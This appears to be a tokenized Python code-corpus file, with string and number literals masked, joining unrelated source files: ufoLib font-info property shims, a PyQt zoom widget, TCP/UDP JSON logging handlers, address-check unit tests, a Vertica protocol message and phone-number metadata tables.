convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> notice = property ( _get_notice , _set_notice ) <EOL> def _get_otFamilyName ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_otFamilyName ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> otFamilyName = property ( _get_otFamilyName , _set_otFamilyName ) <EOL> def _get_otMacName ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_otMacName ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> otMacName = property ( _get_otMacName , _set_otMacName ) <EOL> def _get_otStyleName ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_otStyleName ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> otStyleName = property ( _get_otStyleName , _set_otStyleName ) <EOL> def _get_slantAngle ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_slantAngle ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> slantAngle = property ( _get_slantAngle , _set_slantAngle ) <EOL> def _get_ttUniqueID ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_ttUniqueID ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> ttUniqueID = property ( _get_ttUniqueID , _set_ttUniqueID ) <EOL> def _get_ttVendor ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_ttVendor ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> ttVendor = property ( _get_ttVendor , _set_ttVendor ) <EOL> def _get_ttVersion ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_ttVersion ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> ttVersion = property ( _get_ttVersion , _set_ttVersion ) <EOL> def _get_uniqueID ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_uniqueID ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> uniqueID = property ( _get_uniqueID , _set_uniqueID ) <EOL> def _get_vendorURL ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_vendorURL ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> vendorURL = property ( _get_vendorURL , _set_vendorURL ) <EOL> def _get_weightName ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_weightName ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> weightName = property ( _get_weightName , _set_weightName ) <EOL> def _get_weightValue ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_weightValue ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> weightValue = property ( _get_weightValue , _set_weightValue ) <EOL> def _get_widthName ( self ) : <EOL> newAttr , n = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , None ) <EOL> warn ( "<STR_LIT>" ) <EOL> return getattr ( self , newAttr ) <EOL> def _set_widthName ( self , value ) : <EOL> newAttr , newValue = ufoLib . convertFontInfoValueForAttributeFromVersion1ToVersion2 ( "<STR_LIT>" , value ) <EOL> warn ( "<STR_LIT>" ) <EOL> setattr ( self , newAttr , newValue ) <EOL> widthName = property ( _get_widthName , _set_widthName ) <EOL> def getDataToSerializeForUndo ( self ) : <EOL> data = dict . fromkeys ( ufoLib . fontInfoAttributesVersion2 ) <EOL> for attr in data . keys ( ) : <EOL> data [ attr ] = getattr ( self , attr ) <EOL> return data <EOL> def loadDeserializedDataFromUndo ( self , data ) : <EOL> for attr , value in data . items ( ) : <EOL> if getattr ( self , attr ) == value : <EOL> continue <EOL> setattr ( self , attr , value ) </s>
<s> from PyQt4 . QtGui import * <EOL> from PyQt4 . QtCore import * <EOL> class ZoomWidget ( QSpinBox ) : <EOL> def __init__ ( self , value = <NUM_LIT:100> ) : <EOL> super ( ZoomWidget , self ) . __init__ ( ) <EOL> self . setButtonSymbols ( QAbstractSpinBox . NoButtons ) <EOL> self . setRange ( <NUM_LIT:1> , <NUM_LIT> ) <EOL> self . setSuffix ( '<STR_LIT>' ) <EOL> self . setValue ( value ) <EOL> self . setToolTip ( u'<STR_LIT>' ) <EOL> self . setStatusTip ( self . toolTip ( ) ) <EOL> self . setAlignment ( Qt . AlignCenter ) <EOL> def minimumSizeHint ( self ) : <EOL> height = super ( ZoomWidget , self ) . minimumSizeHint ( ) . height ( ) <EOL> fm = QFontMetrics ( self . font ( ) ) <EOL> width = fm . width ( str ( self . maximum ( ) ) ) <EOL> return QSize ( width , height ) </s>
<s> from traceback import format_exc <EOL> from datetime import datetime <EOL> from Queue import Queue <EOL> import threading <EOL> import logging <EOL> import socket <EOL> import json <EOL> import time <EOL> import ssl <EOL> LOG_QUEUE_SIZE = <NUM_LIT> <EOL> BACKOFF_INITIAL = <NUM_LIT:0.1> <EOL> BACKOFF_MULTIPLE = <NUM_LIT> <EOL> INTERNAL_LOG = logging . getLogger ( '<STR_LIT>' ) <EOL> class TCPHandler ( logging . Handler ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , host , port , ssl_ca_file = None ) : <EOL> '''<STR_LIT>''' <EOL> logging . Handler . __init__ ( self ) <EOL> self . host = host <EOL> self . port = port <EOL> self . ssl_ca_file = ssl_ca_file <EOL> self . sock = None <EOL> self . queue = Queue ( LOG_QUEUE_SIZE ) <EOL> self . connect_wait = BACKOFF_INITIAL <EOL> self . raiseExceptions = <NUM_LIT:0> <EOL> self . hostname = socket . gethostname ( ) <EOL> if self . hostname . find ( '<STR_LIT:.>' ) != - <NUM_LIT:1> : <EOL> self . hostname = self . hostname . split ( '<STR_LIT:.>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> self . sender = threading . Thread ( target = self . run ) <EOL> self . sender . setDaemon ( True ) <EOL> self . sender . start ( ) <EOL> def connect ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . sock = socket . socket ( ) <EOL> if self . ssl_ca_file : <EOL> self . sock = ssl . wrap_socket ( self . sock , <EOL> ssl_version = ssl . PROTOCOL_TLSv1 , <EOL> cert_reqs = ssl . CERT_REQUIRED , <EOL> ca_certs = self . ssl_ca_file ) <EOL> INTERNAL_LOG . debug ( '<STR_LIT>' % <EOL> self . connect_wait ) <EOL> time . sleep ( self . connect_wait ) <EOL> self . sock . connect ( ( self . host , self . port ) ) <EOL> def jsonify ( self , record ) : <EOL> '''<STR_LIT>''' <EOL> timestamp = datetime . utcfromtimestamp ( record . created ) <EOL> timestamp = timestamp . isoformat ( ) <EOL> fields = { <EOL> '<STR_LIT>' : record . levelname , <EOL> '<STR_LIT:filename>' : record . pathname , <EOL> '<STR_LIT>' : record . lineno , <EOL> '<STR_LIT>' : record . funcName , <EOL> } <EOL> if record . exc_info : <EOL> fields [ '<STR_LIT>' ] = str ( record . exc_info ) <EOL> fields [ '<STR_LIT>' ] = format_exc ( record . exc_info ) <EOL> log = { <EOL> '<STR_LIT>' : self . hostname , <EOL> '<STR_LIT>' : timestamp , <EOL> '<STR_LIT>' : [ record . name ] , <EOL> '<STR_LIT>' : record . getMessage ( ) , <EOL> '<STR_LIT>' : fields , <EOL> } <EOL> return json . dumps ( log ) <EOL> def emit ( self , record ) : <EOL> '''<STR_LIT>''' <EOL> self . queue . put_nowait ( record ) <EOL> def run ( self ) : <EOL> '''<STR_LIT>''' <EOL> INTERNAL_LOG . debug ( '<STR_LIT>' ) <EOL> while True : <EOL> record = self . queue . get ( ) <EOL> if record is None : <EOL> break <EOL> jsonrecord = self . jsonify ( record ) <EOL> jsonrecord = '<STR_LIT>' % jsonrecord <EOL> try : <EOL> if self . sock is None : <EOL> self . connect ( ) <EOL> self . send ( jsonrecord ) <EOL> except Exception : <EOL> self . queue . put ( record ) <EOL> self . handleError ( record ) <EOL> self . queue . task_done ( ) <EOL> INTERNAL_LOG . debug ( '<STR_LIT>' ) <EOL> def send ( self , data ) : <EOL> '''<STR_LIT>''' <EOL> while len ( data ) > <NUM_LIT:0> : <EOL> if self . ssl_ca_file : <EOL> sent = self . sock . write ( data ) <EOL> else : <EOL> sent = self . sock . send ( data ) <EOL> data = data [ sent : ] <EOL> self . connect_wait = BACKOFF_INITIAL <EOL> def handleError ( self , record ) : <EOL> '''<STR_LIT>''' <EOL> INTERNAL_LOG . exception ( '<STR_LIT>' ) <EOL> self . cleanup ( ) <EOL> self . connect_wait *= BACKOFF_MULTIPLE <EOL> logging . Handler . handleError ( self , record ) <EOL> def cleanup ( self ) : <EOL> '''<STR_LIT>''' <EOL> if self . sock : <EOL> INTERNAL_LOG . info ( '<STR_LIT>' ) <EOL> self . sock . close ( ) <EOL> self . sock = None <EOL> def close ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . queue . put ( None ) <EOL> self . cleanup ( ) <EOL> class UDPHandler ( logging . Handler ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , host , port ) : <EOL> '''<STR_LIT>''' <EOL> logging . Handler . __init__ ( self ) <EOL> self . host = host <EOL> self . port = port <EOL> self . sock = None <EOL> self . raiseExceptions = <NUM_LIT:0> <EOL> self . hostname = socket . gethostname ( ) <EOL> if self . hostname . find ( '<STR_LIT:.>' ) != - <NUM_LIT:1> : <EOL> self . hostname = self . hostname . split ( '<STR_LIT:.>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> def connect ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . sock = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM ) <EOL> self . sock . connect ( ( self . host , self . port ) ) <EOL> def jsonify ( self , record ) : <EOL> '''<STR_LIT>''' <EOL> timestamp = datetime . utcfromtimestamp ( record . created ) <EOL> timestamp = timestamp . isoformat ( ) <EOL> fields = { <EOL> '<STR_LIT>' : record . levelname , <EOL> '<STR_LIT:filename>' : record . pathname , <EOL> '<STR_LIT>' : record . lineno , <EOL> '<STR_LIT>' : record . funcName , <EOL> } <EOL> if record . exc_info : <EOL> fields [ '<STR_LIT>' ] = str ( record . exc_info ) <EOL> fields [ '<STR_LIT>' ] = format_exc ( record . exc_info ) <EOL> log = { <EOL> '<STR_LIT>' : self . hostname , <EOL> '<STR_LIT>' : timestamp , <EOL> '<STR_LIT>' : [ record . name ] , <EOL> '<STR_LIT>' : record . getMessage ( ) , <EOL> '<STR_LIT>' : fields , <EOL> } <EOL> return json . dumps ( log ) <EOL> def emit ( self , record ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> if self . sock is None : <EOL> self . connect ( ) <EOL> jsonrecord = self . jsonify ( record ) <EOL> jsonrecord = '<STR_LIT>' % jsonrecord <EOL> self . sock . sendall ( jsonrecord ) <EOL> except Exception : <EOL> INTERNAL_LOG . exception ( '<STR_LIT>' ) <EOL> self . close ( ) <EOL> def close ( self ) : <EOL> if self . sock : <EOL> self . sock . close ( ) <EOL> self . sock = None </s>
<s> from __future__ import absolute_import <EOL> import mock <EOL> import unittest <EOL> from mutornadomon . net import is_local_address <EOL> from mutornadomon . net import is_private_address <EOL> class TestIsLocalAddress ( unittest . TestCase ) : <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_is_local_address_works_with_python2 ( self , is_python2_mock ) : <EOL> """<STR_LIT>""" <EOL> is_python2_mock . return_value = True <EOL> self . assertTrue ( is_local_address ( u'<STR_LIT:127.0.0.1>' ) ) <EOL> self . assertTrue ( is_local_address ( '<STR_LIT:127.0.0.1>' ) ) <EOL> self . assertFalse ( is_local_address ( '<STR_LIT>' ) ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_is_local_address_works_with_python3 ( self , is_python2_mock ) : <EOL> """<STR_LIT>""" <EOL> is_python2_mock . return_value = False <EOL> self . assertTrue ( is_local_address ( u'<STR_LIT:127.0.0.1>' ) ) <EOL> self . assertTrue ( is_local_address ( '<STR_LIT:127.0.0.1>' ) ) <EOL> self . assertFalse ( is_local_address ( '<STR_LIT>' ) ) <EOL> class TestIsPrivateAddress ( unittest . TestCase ) : <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_is_private_address_works_with_python2 ( self , is_python2_mock ) : <EOL> """<STR_LIT>""" <EOL> is_python2_mock . return_value = True <EOL> self . assertTrue ( is_private_address ( u'<STR_LIT:127.0.0.1>' ) ) <EOL> self . assertTrue ( is_private_address ( '<STR_LIT:127.0.0.1>' ) ) <EOL> self . assertFalse ( is_private_address ( '<STR_LIT>' ) ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_is_private_address_works_with_python3 ( self , is_python2_mock ) : <EOL> """<STR_LIT>""" <EOL> is_python2_mock . return_value = False <EOL> self . assertTrue ( is_private_address ( u'<STR_LIT:127.0.0.1>' ) ) <EOL> self . assertTrue ( is_private_address ( '<STR_LIT:127.0.0.1>' ) ) <EOL> self . assertFalse ( is_private_address ( '<STR_LIT>' ) ) </s>
<s> from struct import pack <EOL> from vertica_python . vertica . messages . message import FrontendMessage <EOL> class CopyFail ( FrontendMessage ) : <EOL> def __init__ ( self , error_message ) : <EOL> self . error_message = error_message <EOL> def to_bytes ( self ) : <EOL> return self . message_string ( pack ( '<STR_LIT>' . format ( len ( self . error_message ) ) , self . error_message ) ) <EOL> CopyFail . _message_id ( b'<STR_LIT:f>' ) </s>
<s> """<STR_LIT>""" <EOL> from . . phonemetadata import NumberFormat , PhoneNumberDesc , PhoneMetadata <EOL> PHONE_METADATA_882 = PhoneMetadata ( id = '<STR_LIT>' , country_code = <NUM_LIT> , international_prefix = None , <EOL> general_desc = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> fixed_line = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> mobile = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> toll_free = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> premium_rate = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> shared_cost = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> personal_number = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> voip = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> pager = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> uan = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> emergency = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> voicemail = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> no_international_dialling = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> number_format = [ NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] ) , <EOL> NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] ) , <EOL> NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] ) , <EOL> NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] ) , <EOL> NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT:1>' ] ) , <EOL> NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] ) , <EOL> NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] ) ] ) </s>
<s> """<STR_LIT>""" <EOL> from . . phonemetadata import NumberFormat , PhoneNumberDesc , PhoneMetadata <EOL> PHONE_METADATA_BJ = PhoneMetadata ( id = '<STR_LIT>' , country_code = <NUM_LIT> , international_prefix = '<STR_LIT>' , <EOL> general_desc = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> fixed_line = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> mobile = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> toll_free = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> premium_rate = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> shared_cost = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> personal_number = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> voip = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> pager = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> uan = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> emergency = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> voicemail = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> no_international_dialling = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> number_format = [ NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' ) ] ) </s>
<s> """<STR_LIT>""" <EOL> from . . phonemetadata import NumberFormat , PhoneNumberDesc , PhoneMetadata <EOL> PHONE_METADATA_CX = PhoneMetadata ( id = '<STR_LIT>' , country_code = <NUM_LIT> , international_prefix = '<STR_LIT>' , <EOL> general_desc = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> fixed_line = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> mobile = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> toll_free = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> premium_rate = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> shared_cost = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> personal_number = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> voip = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> pager = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> uan = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> emergency = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> voicemail = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> no_international_dialling = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> preferred_international_prefix = '<STR_LIT>' , <EOL> national_prefix = '<STR_LIT:0>' , <EOL> national_prefix_for_parsing = '<STR_LIT:0>' ) </s>
<s> """<STR_LIT>""" <EOL> from . . phonemetadata import NumberFormat , PhoneNumberDesc , PhoneMetadata <EOL> PHONE_METADATA_GH = PhoneMetadata ( id = '<STR_LIT>' , country_code = <NUM_LIT> , international_prefix = '<STR_LIT>' , <EOL> general_desc = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> fixed_line = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> mobile = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> toll_free = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> premium_rate = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> shared_cost = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> personal_number = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> voip = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> pager = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> uan = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> emergency = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> voicemail = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> no_international_dialling = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> national_prefix = '<STR_LIT:0>' , <EOL> national_prefix_for_parsing = '<STR_LIT:0>' , <EOL> number_format = [ NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] , national_prefix_formatting_rule = u'<STR_LIT>' ) , <EOL> NumberFormat ( pattern = '<STR_LIT>' , format = u'<STR_LIT>' , leading_digits_pattern = [ '<STR_LIT>' ] , national_prefix_formatting_rule = u'<STR_LIT>' ) ] ) </s>
<s> """<STR_LIT>""" <EOL> from . . phonemetadata import NumberFormat , PhoneNumberDesc , PhoneMetadata <EOL> PHONE_METADATA_JM = PhoneMetadata ( id = '<STR_LIT>' , country_code = <NUM_LIT:1> , international_prefix = '<STR_LIT>' , <EOL> general_desc = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> fixed_line = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> mobile = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> toll_free = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> premium_rate = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> shared_cost = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> personal_number = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> voip = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> pager = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> uan = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> emergency = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' , example_number = '<STR_LIT>' ) , <EOL> voicemail = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> no_international_dialling = PhoneNumberDesc ( national_number_pattern = '<STR_LIT>' , possible_number_pattern = '<STR_LIT>' ) , <EOL> national_prefix = '<STR_LIT:1>' , <EOL> national_prefix_for_parsing = '<STR_LIT:1>' , <EOL> leading_digits = '<STR_LIT>' ) </s>
